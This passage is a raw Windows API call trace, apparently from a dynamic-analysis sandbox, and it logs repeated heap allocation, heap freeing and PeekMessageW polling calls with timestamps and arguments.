lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.068] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.068] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0121.069] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0121.069] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0121.069] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d58 | out: hHeap=0x12c0000) returned 1 [0121.069] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d98 [0121.070] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d98 | out: hHeap=0x12c0000) returned 1 [0121.070] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.070] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.070] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.070] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.071] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491978 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491978 | out: hHeap=0x12c0000) returned 1 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.071] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.071] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.071] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.071] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.072] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd718 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.073] GetLastError () returned 0x0 [0121.073] SetLastError (dwErrCode=0x0) [0121.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.073] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff410 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0121.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300bd0 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.074] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.074] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.074] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.074] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.075] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.075] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.075] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d98 [0121.075] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d98 | out: hHeap=0x12c0000) returned 1 [0121.075] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a58 [0121.076] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a58 | out: hHeap=0x12c0000) returned 1 [0121.076] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0121.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.077] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.077] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.077] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.077] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.077] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0121.077] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.079] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458f58 [0121.080] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458f58 | out: hHeap=0x12c0000) returned 1 [0121.080] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.080] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd790 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.080] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.080] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.080] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 